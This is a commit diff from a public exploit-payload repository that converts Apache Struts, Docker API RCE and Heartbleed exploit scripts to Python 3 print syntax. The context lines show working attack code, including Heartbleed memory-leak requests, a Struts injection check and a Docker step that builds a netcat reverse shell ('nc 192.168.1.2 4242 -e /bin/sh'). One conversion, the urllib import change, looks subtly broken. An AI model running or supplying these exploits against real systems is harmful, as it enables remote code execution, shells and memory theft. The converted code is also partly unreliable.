Merge pull request swisskyrepo#43 from cclauss/print-function

Use print() function in both Python 2 and Python 3

CVE Exploits/Apache Struts 2 CVE-2017-9805.py

@@ -8,6 +8,8 @@
 # https://github.com/rapid7/metasploit-framework/pull/8924
 # https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
 # *****************************************************
+from __future__ import print_function
+from builtins import str
 import argparse
 import requests
 import sys

CVE Exploits/Apache Struts 2 CVE-2018-11776.py

@@ -8,14 +8,19 @@
 # https://github.com/jas502n/St2-057
 # *****************************************************
 
+from __future__ import print_function
+from future import standard_library
+standard_library.install_aliases()
+from builtins import str
+from builtins import range
 import argparse
 import random
 import requests
 import sys
 try:
     from urllib import parse as urlparse
 except ImportError:
-    import urlparse
+    import urllib.parse
 
 # Disable SSL warnings
 try:
@@ -77,13 +82,13 @@ def parse_url(url):
 
     if ('://' not in url):
         url = str("http://") + str(url)
-    scheme = urlparse.urlparse(url).scheme
+    scheme = urllib.parse.urlparse(url).scheme
 
     # Site: http://example.com
-    site = scheme + '://' + urlparse.urlparse(url).netloc
+    site = scheme + '://' + urllib.parse.urlparse(url).netloc
 
     # FilePath: /demo/struts2-showcase/index.action
-    file_path = urlparse.urlparse(url).path
+    file_path = urllib.parse.urlparse(url).path
     if (file_path == ''):
         file_path = '/'
 
@@ -154,7 +159,7 @@ def check(url):
         except Exception as e:
             print("EXCEPTION::::--> " + str(e))
             continue
-        if "Location" in resp.headers.keys():
+        if "Location" in list(resp.headers.keys()):
             if str(multiplication_value) in resp.headers['Location']:
                 print("[*] Status: Vulnerable!")
                 return(injection_point)

CVE Exploits/Docker API RCE.py

@@ -1,3 +1,4 @@
+from __future__ import print_function
 import requests
 import logging
 import json
@@ -23,7 +24,7 @@
     for container in r.json():
         container_id   = container['Id']
         container_name = container['Names'][0].replace('/','')
-        print(container_id, container_name)
+        print((container_id, container_name))
 
         # Step 2 - Prepare command
         cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'

CVE Exploits/Heartbleed CVE-2014-0160.py

@@ -4,6 +4,9 @@
 # The author disclaims copyright to this source code.
 # Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
 
+from __future__ import print_function
+from builtins import str
+from builtins import range
 import sys
 import struct
 import socket
@@ -61,12 +64,12 @@ def hexdump(s, dumpf, quiet):
 	dump.write(s)
 	dump.close()
 	if quiet: return
-	for b in xrange(0, len(s), 16):
+	for b in range(0, len(s), 16):
 		lin = [c for c in s[b : b + 16]]
 		hxdat = ' '.join('%02X' % ord(c) for c in lin)
 		pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
-		print '  %04x: %-48s %s' % (b, hxdat, pdat)
-	print
+		print('  %04x: %-48s %s' % (b, hxdat, pdat))
+	print()
 
 def recvall(s, length, timeout=5):
 	endtime = time.time() + timeout
@@ -92,57 +95,57 @@ def recvall(s, length, timeout=5):
 def recvmsg(s):
 	hdr = recvall(s, 5)
 	if hdr is None:
-		print 'Unexpected EOF receiving record header - server closed connection'
+		print('Unexpected EOF receiving record header - server closed connection')
 		return None, None, None
 	typ, ver, ln = struct.unpack('>BHH', hdr)
 	pay = recvall(s, ln, 10)
 	if pay is None:
-		print 'Unexpected EOF receiving record payload - server closed connection'
+		print('Unexpected EOF receiving record payload - server closed connection')
 		return None, None, None
-	print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
+	print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
 	return typ, ver, pay
 
 def hit_hb(s, dumpf, host, quiet):
 	while True:
 		typ, ver, pay = recvmsg(s)
 		if typ is None:
-			print 'No heartbeat response received from '+host+', server likely not vulnerable'
+			print('No heartbeat response received from '+host+', server likely not vulnerable')
 			return False
 
 		if typ == 24:
-			if not quiet: print 'Received heartbeat response:'
+			if not quiet: print('Received heartbeat response:')
 			hexdump(pay, dumpf, quiet)
 			if len(pay) > 3:
-				print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!'
+				print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!')
 			else:
-				print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.'
+				print('Server '+host+' processed malformed heartbeat, but did not return any extra data.')
 			return True
 
 		if typ == 21:
-			if not quiet: print 'Received alert:'
+			if not quiet: print('Received alert:')
 			hexdump(pay, dumpf, quiet)
-			print 'Server '+ host +' returned error, likely not vulnerable'
+			print('Server '+ host +' returned error, likely not vulnerable')
 			return False
 
 def connect(host, port, quiet):
 	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-	if not quiet: print 'Connecting...'
+	if not quiet: print('Connecting...')
 	sys.stdout.flush()
 	s.connect((host, port))
 	return s
 
 def tls(s, quiet):
-	if not quiet: print 'Sending Client Hello...'
+	if not quiet: print('Sending Client Hello...')
 	sys.stdout.flush()
 	s.send(hello)
-	if not quiet: print 'Waiting for Server Hello...'
+	if not quiet: print('Waiting for Server Hello...')
 	sys.stdout.flush()
 
 def parseresp(s):
 	while True:
 		typ, ver, pay = recvmsg(s)
 		if typ == None:
-			print 'Server closed connection without sending Server Hello.'
+			print('Server closed connection without sending Server Hello.')
 			return 0
 		# Look for server hello done message.
 		if typ == 22 and ord(pay[0]) == 0x0E:
@@ -156,10 +159,10 @@ def check(host, port, dumpf, quiet, starttls):
 			s.ehlo()
 			s.starttls()
 		except smtplib.SMTPException:
-			print 'STARTTLS not supported...'
+			print('STARTTLS not supported...')
 			s.quit()
 			return False
-		print 'STARTTLS supported...'
+		print('STARTTLS supported...')
 		s.quit()
 		s = connect(host, port, quiet)
 		s.settimeout(1)
@@ -170,7 +173,7 @@ def check(host, port, dumpf, quiet, starttls):
 			s.send('starttls\r\n')
 			re = s.recv(1024)
 		except socket.timeout:
-			print 'Timeout issues, going ahead anyway, but it is probably broken ...'
+			print('Timeout issues, going ahead anyway, but it is probably broken ...')
 		tls(s,quiet)
 	else:
 		s = connect(host, port, quiet)
@@ -179,13 +182,13 @@ def check(host, port, dumpf, quiet, starttls):
 	version = parseresp(s)
 
 	if version == 0:
-		if not quiet: print "Got an error while parsing the response, bailing ..."
+		if not quiet: print("Got an error while parsing the response, bailing ...")
 		return False
 	else:
 		version = version - 0x0300
-		if not quiet: print "Server TLS version was 1.%d\n" % version
+		if not quiet: print("Server TLS version was 1.%d\n" % version)
 
-	if not quiet: print 'Sending heartbeat request...'
+	if not quiet: print('Sending heartbeat request...')
 	sys.stdout.flush()
 	if (version == 1):
 		s.send(hbv10)
@@ -205,8 +208,8 @@ def main():
 		options.print_help()
 		return
 
-	print 'Scanning ' + args[0] + ' on port ' + str(opts.port)
-	for i in xrange(0,opts.num):
+	print('Scanning ' + args[0] + ' on port ' + str(opts.port))
+	for i in range(0,opts.num):
 		check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)
 
 if __name__ == '__main__':